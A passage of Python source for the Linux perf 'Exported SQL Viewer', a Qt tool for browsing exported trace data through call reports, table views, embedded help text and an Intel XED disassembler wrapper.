		stmt = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name"
	query = QSqlQuery(glb.db)
	QueryExec(query, stmt)
	tables = []
	while query.next():
		tables.append(query.value(0))
	if glb.dbref.is_sqlite3:
		tables.append("sqlite_master")
	else:
		tables.extend(["information_schema.tables", "information_schema.views", "information_schema.columns"])
	return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
	"""Data model for the 'Top calls by elapsed time' report."""
	def __init__(self, glb, report_vars, parent=None):
		# '::text' casts the CASE results in the non-SQLite (PostgreSQL)
		# case; SQLite needs no cast
		text = ""
		if not glb.dbref.is_sqlite3:
			text = "::text"
		limit = ""
		if len(report_vars.limit):
			limit = " LIMIT " + report_vars.limit
		sql = ("SELECT comm, pid, tid, name,"
			" CASE"
			" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
			" ELSE short_name"
			" END AS dso,"
			" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
			" CASE"
			" WHEN (calls.flags = 1) THEN 'no call'" + text +
			" WHEN (calls.flags = 2) THEN 'no return'" + text +
			" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
			" ELSE ''" + text +
			" END AS flags"
			" FROM calls"
			" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
			" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
			" INNER JOIN dsos ON symbols.dso_id = dsos.id"
			" INNER JOIN comms ON calls.comm_id = comms.id"
			" INNER JOIN threads ON calls.thread_id = threads.id" +
			report_vars.where_clause +
			" ORDER BY elapsed_time DESC" +
			limit
			)
		column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
		# Numeric columns (elapsed time, branch count) are right-aligned
		self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
		super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
	def columnAlignment(self, column):
		return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
	"""Dialog gathering the selection criteria for a top calls report."""

	def __init__(self, glb, parent=None):
		title = "Top Calls by Elapsed Time"
		items = (lambda gl, pr: LineEditDataItem(gl, "Report name:", "Enter a name to appear in the window title bar", pr, "REPORTNAME"),
			 lambda gl, pr: SQLTableDataItem(gl, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", pr),
			 lambda gl, pr: LineEditDataItem(gl, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", pr),
			 lambda gl, pr: PositiveIntegerDataItem(gl, "Record limit:", "Limit selection to this number of records", pr, "LIMIT", "100"))
		super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
	"""MDI window displaying a 'Top calls by elapsed time' report."""
	def __init__(self, glb, report_vars, parent=None):
		super(TopCallsWindow, self).__init__(parent)
		# The SQL already orders the rows, so no sort proxy is used here
		self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
		self.model = self.data_model
		self.view = QTableView()
		self.view.setModel(self.model)
		self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
		self.view.verticalHeader().setVisible(False)
		self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
		self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
		self.context_menu = ContextMenu(self.view)
		self.ResizeColumnsToContents()
		self.find_bar = FindBar(self, self, True)
		self.finder = ChildDataItemFinder(self.model)
		self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
		self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
		self.setWidget(self.vbox.Widget())
		AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
	def Find(self, value, direction, pattern, context):
		self.view.setFocus()
		self.find_bar.Busy()
		self.finder.Find(value, direction, pattern, context, self.FindDone)
	def FindDone(self, row):
		self.find_bar.Idle()
		if row >= 0:
			self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
		else:
			self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
	"""Create a QAction with the given label, status tip and triggered
	callback, optionally bound to a standard key sequence."""
	action = QAction(label, parent)
	# 'is not None' rather than '!= None': identity test for the sentinel
	if shortcut is not None:
		action.setShortcuts(shortcut)
	action.setStatusTip(tip)
	action.triggered.connect(callback)
	return action
# Typical application actions
def CreateExitAction(app, parent=None):
	"""Create the standard application Quit action."""
	return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
	"""Create the MDI 'Close active window' action."""
	return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)

def CreateCloseAllWindowsAction(mdi_area):
	"""Create the MDI 'Close all windows' action."""
	return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)

def CreateTileWindowsAction(mdi_area):
	"""Create the MDI 'Tile windows' action."""
	return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)

def CreateCascadeWindowsAction(mdi_area):
	"""Create the MDI 'Cascade windows' action."""
	return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)

def CreateNextWindowAction(mdi_area):
	"""Create the MDI 'Next window' action with the standard shortcut."""
	return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)

def CreatePreviousWindowAction(mdi_area):
	"""Create the MDI 'Previous window' action with the standard shortcut."""
	return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
	"""Standard MDI 'Windows' menu, rebuilt each time it is shown."""
	def __init__(self, mdi_area, menu):
		self.mdi_area = mdi_area
		self.window_menu = menu.addMenu("&Windows")
		self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
		self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
		self.tile_windows = CreateTileWindowsAction(mdi_area)
		self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
		self.next_window = CreateNextWindowAction(mdi_area)
		self.previous_window = CreatePreviousWindowAction(mdi_area)
		# Populate lazily so the sub-window list is always current
		self.window_menu.aboutToShow.connect(self.Update)
	def Update(self):
		"""Rebuild the menu to reflect the current set of sub-windows."""
		self.window_menu.clear()
		sub_window_count = len(self.mdi_area.subWindowList())
		have_sub_windows = sub_window_count != 0
		# Standard actions only make sense when windows exist
		self.close_active_window.setEnabled(have_sub_windows)
		self.close_all_windows.setEnabled(have_sub_windows)
		self.tile_windows.setEnabled(have_sub_windows)
		self.cascade_windows.setEnabled(have_sub_windows)
		self.next_window.setEnabled(have_sub_windows)
		self.previous_window.setEnabled(have_sub_windows)
		self.window_menu.addAction(self.close_active_window)
		self.window_menu.addAction(self.close_all_windows)
		self.window_menu.addSeparator()
		self.window_menu.addAction(self.tile_windows)
		self.window_menu.addAction(self.cascade_windows)
		self.window_menu.addSeparator()
		self.window_menu.addAction(self.next_window)
		self.window_menu.addAction(self.previous_window)
		if sub_window_count == 0:
			return
		self.window_menu.addSeparator()
		# One numbered, checkable entry per sub-window; '&' gives the
		# first nine entries a mnemonic
		nr = 1
		for sub_window in self.mdi_area.subWindowList():
			label = str(nr) + " " + sub_window.name
			if nr < 10:
				label = "&" + label
			action = self.window_menu.addAction(label)
			action.setCheckable(True)
			action.setChecked(sub_window == self.mdi_area.activeSubWindow())
			# x=nr binds the current value now, avoiding the
			# late-binding closure pitfall
			action.triggered.connect(lambda a=None,x=nr: self.setActiveSubWindow(x))
			self.window_menu.addAction(action)
			nr += 1
	def setActiveSubWindow(self, nr):
		# nr is 1-based, matching the menu labels
		self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
# HTML help shown by HelpWindow / HelpOnlyWindow in a QTextBrowser.
# Fixes vs. original: removed a stray '}' after the p.c2 CSS rule and added
# the missing </li> on the 'Branch Count' list item.
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls</li>
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would be always 1, is replaced by the 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Instructions per Cycle (IPC)</h3>
If available, IPC information is displayed in columns 'insn_cnt', 'cyc_cnt' and 'IPC'.
<p><b>Intel PT note:</b> The information applies to the blocks of code ending with, and including, that branch.
Due to the granularity of timing information, the number of cycles for some code blocks will not be known.
In that case, 'insn_cnt', 'cyc_cnt' and 'IPC' are zero, but when 'IPC' is displayed it covers the period
since the previous displayed 'IPC'.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
    """MDI sub-window that displays the built-in help text (glb_help_text)."""
    def __init__(self, glb, parent=None):
        super(HelpWindow, self).__init__(parent)
        self.text = QTextBrowser()
        self.text.setHtml(glb_help_text)
        self.text.setReadOnly(True)
        # External (http) links open in the user's browser instead of inline.
        self.text.setOpenExternalLinks(True)
        self.setWidget(self.text)
        AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
    """Standalone main window that only shows the help text.

    Used by Main() for the --help-only command-line option, so help can be
    viewed without opening a database.
    """
    def __init__(self, parent=None):
        super(HelpOnlyWindow, self).__init__(parent)
        self.setMinimumSize(200, 100)
        self.resize(800, 600)
        self.setWindowTitle("Exported SQL Viewer Help")
        self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
        self.text = QTextBrowser()
        self.text.setHtml(glb_help_text)
        self.text.setReadOnly(True)
        self.text.setOpenExternalLinks(True)
        self.setCentralWidget(self.text)
# PostqreSQL server version
def PostqreSQLServerVersion(db):
    """Return the PostgreSQL server version for db.

    Extracts the version number from "PostgreSQL <ver> on ..."; falls back to
    the raw VERSION() string, or "Unknown" if the query returns no row.
    """
    query = QSqlQuery(db)
    QueryExec(query, "SELECT VERSION()")
    if not query.next():
        return "Unknown"
    version_string = query.value(0)
    words = version_string.strip().split(" ")
    if words[0] == "PostgreSQL" and words[2] == "on":
        return words[1]
    return version_string
# SQLite version
def SQLiteVersion(db):
    """Return the SQLite library version for db, or "Unknown"."""
    query = QSqlQuery(db)
    QueryExec(query, "SELECT sqlite_version()")
    return query.value(0) if query.next() else "Unknown"
# About dialog
class AboutDialog(QDialog):
    """About dialog showing Python/PySide/Qt and database engine versions."""
    def __init__(self, glb, parent=None):
        super(AboutDialog, self).__init__(parent)
        self.setWindowTitle("About Exported SQL Viewer")
        self.setMinimumWidth(300)
        # NOTE(review): pyside_version_1 is a module-level flag presumably set
        # during startup from the --pyside-version-1 option — defined outside
        # this view, confirm before relying on it.
        pyside_version = "1" if pyside_version_1 else "2"
        text = "<pre>"
        text += "Python version:     " + sys.version.split(" ")[0] + "\n"
        text += "PySide version:     " + pyside_version + "\n"
        text += "Qt version:         " + qVersion() + "\n"
        if glb.dbref.is_sqlite3:
            text += "SQLite version:     " + SQLiteVersion(glb.db) + "\n"
        else:
            text += "PostqreSQL version: " + PostqreSQLServerVersion(glb.db) + "\n"
        text += "</pre>"
        self.text = QTextBrowser()
        self.text.setHtml(text)
        self.text.setReadOnly(True)
        self.text.setOpenExternalLinks(True)
        self.vbox = QVBoxLayout()
        self.vbox.addWidget(self.text)
        self.setLayout(self.vbox)
# Font resize
def ResizeFont(widget, diff):
    """Adjust widget's font point size by diff (may be negative)."""
    font = widget.font()
    font.setPointSize(font.pointSize() + diff)
    widget.setFont(font)
def ShrinkFont(widget):
    """Decrease widget's font size by one point."""
    ResizeFont(widget, -1)
def EnlargeFont(widget):
    """Increase widget's font size by one point."""
    ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
    """Return name with an " <nr>" suffix for duplicates beyond the first."""
    if nr <= 1:
        return name
    return "%s <%s>" % (name, nr)
def UniqueSubWindowName(mdi_area, name):
    """Return name, numbered if necessary, so it is unique among the names of
    mdi_area's current sub-windows."""
    taken = set(w.name for w in mdi_area.subWindowList())
    nr = 1
    while True:
        candidate = NumberedWindowName(name, nr)
        if candidate not in taken:
            return candidate
        nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
    """Register sub_window with mdi_area under a unique, numbered title and
    show it. Stores the unique name on sub_window.name for later lookup."""
    unique_name = UniqueSubWindowName(mdi_area, name)
    sub_window.setMinimumSize(200, 100)
    sub_window.resize(800, 600)
    sub_window.setWindowTitle(unique_name)
    # Delete the widget on close so closed windows do not accumulate.
    sub_window.setAttribute(Qt.WA_DeleteOnClose)
    sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
    sub_window.name = unique_name
    mdi_area.addSubWindow(sub_window)
    sub_window.show()
# Main window
class MainWindow(QMainWindow):
    """Top-level application window: an MDI area plus File/Edit/Reports/Tables/
    Windows/Help menus. Report and table windows open as MDI sub-windows."""

    def __init__(self, glb, parent=None):
        super(MainWindow, self).__init__(parent)

        self.glb = glb

        self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
        self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
        self.setMinimumSize(200, 100)

        self.mdi_area = QMdiArea()
        self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
        self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)

        self.setCentralWidget(self.mdi_area)

        menu = self.menuBar()

        file_menu = menu.addMenu("&File")
        file_menu.addAction(CreateExitAction(glb.app, self))

        edit_menu = menu.addMenu("&Edit")
        edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
        edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
        edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
        edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
        edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
        edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))

        reports_menu = menu.addMenu("&Reports")
        # Only offer call-based reports when the calls table exists.
        if IsSelectable(glb.db, "calls"):
            reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
        if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
            reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))

        self.EventMenu(GetEventList(glb.db), reports_menu)

        if IsSelectable(glb.db, "calls"):
            reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))

        self.TableMenu(GetTableList(glb), menu)

        self.window_menu = WindowMenu(self.mdi_area, menu)

        help_menu = menu.addMenu("&Help")
        help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
        help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))

    def Try(self, fn):
        """Apply fn to the active sub-window's view; ignore windows without one."""
        win = self.mdi_area.activeSubWindow()
        if win:
            try:
                fn(win.view)
            except:
                pass

    def CopyToClipboard(self):
        self.Try(CopyCellsToClipboardHdr)

    def CopyToClipboardCSV(self):
        self.Try(CopyCellsToClipboardCSV)

    def Find(self):
        """Show the active sub-window's Find bar, if it has one."""
        win = self.mdi_area.activeSubWindow()
        if win:
            try:
                win.find_bar.Activate()
            except:
                pass

    def FetchMoreRecords(self):
        """Show the active sub-window's Fetch bar, if it has one."""
        win = self.mdi_area.activeSubWindow()
        if win:
            try:
                win.fetch_bar.Activate()
            except:
                pass

    def ShrinkFont(self):
        self.Try(ShrinkFont)

    def EnlargeFont(self):
        self.Try(EnlargeFont)

    def EventMenu(self, events, reports_menu):
        """Add "All branches" / "Selected branches" report actions for each
        branches event; labels carry the event id when there is more than one."""
        branches_events = 0
        for event in events:
            event = event.split(":")[0]
            if event == "branches":
                branches_events += 1
        dbid = 0
        for event in events:
            dbid += 1
            event = event.split(":")[0]
            if event == "branches":
                # Fix: dbid is an int, so it must be converted with str().
                # The original concatenated it directly, raising TypeError
                # whenever more than one branches event existed.
                label = "All branches" if branches_events == 1 else "All branches " + "(id=" + str(dbid) + ")"
                reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewBranchView(x), self))
                label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + str(dbid) + ")"
                reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewSelectedBranchView(x), self))

    def TableMenu(self, tables, menu):
        """Add a Tables menu with one action per table/view in the database."""
        table_menu = menu.addMenu("&Tables")
        for table in tables:
            # t=table freezes the loop value for each action (late binding).
            table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None,t=table: self.NewTableView(t), self))

    def NewCallGraph(self):
        CallGraphWindow(self.glb, self)

    def NewCallTree(self):
        CallTreeWindow(self.glb, self)

    def NewTopCalls(self):
        dialog = TopCallsDialog(self.glb, self)
        ret = dialog.exec_()
        if ret:
            TopCallsWindow(self.glb, dialog.report_vars, self)

    def NewBranchView(self, event_id):
        BranchWindow(self.glb, event_id, ReportVars(), self)

    def NewSelectedBranchView(self, event_id):
        dialog = SelectedBranchDialog(self.glb, self)
        ret = dialog.exec_()
        if ret:
            BranchWindow(self.glb, event_id, dialog.report_vars, self)

    def NewTableView(self, table_name):
        TableWindow(self.glb, table_name, self)

    def Help(self):
        HelpWindow(self.glb, self)

    def About(self):
        dialog = AboutDialog(self.glb, self)
        dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
    """ctypes mirror of libxed's xed_state_t: machine mode and address width."""
    _fields_ = [("mode", c_int), ("width", c_int)]
class XEDInstruction():
    """Per-instruction decode state for LibXED: a decoded-instruction buffer,
    a mode state and a text buffer, plus their raw addresses for ctypes calls."""
    def __init__(self, libxed):
        # Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
        xedd_t = c_byte * 512
        self.xedd = xedd_t()
        self.xedp = addressof(self.xedd)
        libxed.xed_decoded_inst_zero(self.xedp)
        self.state = xed_state_t()
        self.statep = addressof(self.state)
        # Buffer for disassembled instruction text
        self.buffer = create_string_buffer(256)
        self.bufferp = addressof(self.buffer)
class LibXED():
    """Thin ctypes wrapper around the Intel XED disassembler library.

    Raises (from CDLL) if libxed.so cannot be loaded from the default search
    path or /usr/local/lib, which Glb uses to disable disassembly.
    """
    def __init__(self):
        try:
            self.libxed = CDLL("libxed.so")
        except:
            self.libxed = None
        if not self.libxed:
            # Fall back to the default 'sudo mfile.py --prefix=/usr/local install' location.
            self.libxed = CDLL("/usr/local/lib/libxed.so")
        # Declare restype/argtypes for each entry point so ctypes marshals
        # pointers and integers correctly on all platforms.
        self.xed_tables_init = self.libxed.xed_tables_init
        self.xed_tables_init.restype = None
        self.xed_tables_init.argtypes = []
        self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
        self.xed_decoded_inst_zero.restype = None
        self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
        self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
        self.xed_operand_values_set_mode.restype = None
        self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
        self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
        self.xed_decoded_inst_zero_keep_mode.restype = None
        self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
        self.xed_decode = self.libxed.xed_decode
        self.xed_decode.restype = c_int
        self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
        self.xed_format_context = self.libxed.xed_format_context
        self.xed_format_context.restype = c_uint
        self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
        self.xed_tables_init()
    def Instruction(self):
        """Create a fresh decode-state object bound to this library."""
        return XEDInstruction(self)
    def SetMode(self, inst, mode):
        """Set 32-bit (mode truthy) or 64-bit (mode falsy) decoding on inst."""
        if mode:
            inst.state.mode = 4 # 32-bit
            inst.state.width = 4 # 4 bytes
        else:
            inst.state.mode = 1 # 64-bit
            inst.state.width = 8 # 8 bytes
        self.xed_operand_values_set_mode(inst.xedp, inst.statep)
    def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
        """Disassemble one instruction at bytes_ptr.

        Returns (instruction length, text), or (0, "") on decode/format failure.
        """
        self.xed_decoded_inst_zero_keep_mode(inst.xedp)
        err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
        if err:
            return 0, ""
        # Use AT&T mode (2), alternative is Intel (3)
        ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
        if not ok:
            return 0, ""
        if sys.version_info[0] == 2:
            result = inst.buffer.value
        else:
            result = inst.buffer.value.decode()
        # Return instruction length and the disassembled instruction text
        # For now, assume the length is in byte 166
        return inst.xedd[166], result
def TryOpen(file_name):
    """Open file_name for binary reading; return the file object or None.

    Failure to open (missing file, permissions, bad path) is expected and
    returns None; unrelated errors now propagate instead of being swallowed
    by the original bare except.
    """
    try:
        return open(file_name, "rb")
    except (IOError, OSError):
        return None
def Is64Bit(f):
    """Return True/False for a 64/32-bit ELF file f.

    For non-ELF input the original fallback is kept: sizeof(c_void_p), a
    truthy int meaning "assume native pointer width". f's position is
    preserved.
    """
    result = sizeof(c_void_p)
    # ELF support only
    pos = f.tell()
    f.seek(0)
    header = f.read(7)
    f.seek(pos)
    magic = header[0:4]
    if sys.version_info[0] == 2:
        eclass = ord(header[4])
        encoding = ord(header[5])
        version = ord(header[6])
        elf_magic = chr(127) + "ELF"
    else:
        eclass = header[4]
        encoding = header[5]
        version = header[6]
        # Fix: f is opened in binary mode, so on Python 3 magic is bytes and
        # the original comparison against the str chr(127) + "ELF" was always
        # False — every file took the non-ELF fallback path.
        elf_magic = b"\x7fELF"
    # e_ident: EI_CLASS 1/2 = 32/64-bit, EI_DATA 1/2 = LSB/MSB, EI_VERSION 1
    if magic == elf_magic and 0 < eclass < 3 and 0 < encoding < 3 and version == 1:
        result = (eclass == 2)
    return result
# Global data
class Glb():
    """Application-wide shared state: database handles, paths, the Qt objects
    and the optional disassembler."""
    def __init__(self, dbref, db, dbname):
        self.dbref = dbref      # DBRef, used to open further connections
        self.db = db            # main database connection
        self.dbname = dbname
        self.home_dir = os.path.expanduser("~")
        # perf build ID cache: $PERF_BUILDID_DIR, or ~/.debug by default.
        self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
        if self.buildid_dir:
            self.buildid_dir += "/.build-id/"
        else:
            self.buildid_dir = self.home_dir + "/.debug/.build-id/"
        self.app = None         # QApplication, assigned by Main()
        self.mainwindow = None  # MainWindow, assigned by Main()
        # Weak references: registering for shutdown must not keep objects alive.
        self.instances_to_shutdown_on_exit = weakref.WeakSet()
        try:
            self.disassembler = LibXED()
            self.have_disassembler = True
        except:
            # libxed.so not installed; disassembly is simply unavailable.
            self.have_disassembler = False
    def FileFromBuildId(self, build_id):
        """Open the cached ELF for build_id (cache layout <xx>/<rest>/elf)."""
        file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
        return TryOpen(file_name)
    def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
        """Locate object code: $PERF_KCORE / kcore path for kernel DSOs, then
        the DSO long name, then the build ID cache. Returns a file or None."""
        # Assume current machine i.e. no support for virtualization
        if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
            file_name = os.getenv("PERF_KCORE")
            f = TryOpen(file_name) if file_name else None
            if f:
                return f
            # For now, no special handling if long_name is /proc/kcore
            f = TryOpen(long_name)
            if f:
                return f
        f = self.FileFromBuildId(build_id)
        if f:
            return f
        return None
    def AddInstanceToShutdownOnExit(self, instance):
        self.instances_to_shutdown_on_exit.add(instance)
    # Shutdown any background processes or threads
    def ShutdownInstances(self):
        """Best-effort Shutdown() of every registered instance."""
        for x in self.instances_to_shutdown_on_exit:
            try:
                x.Shutdown()
            except:
                pass
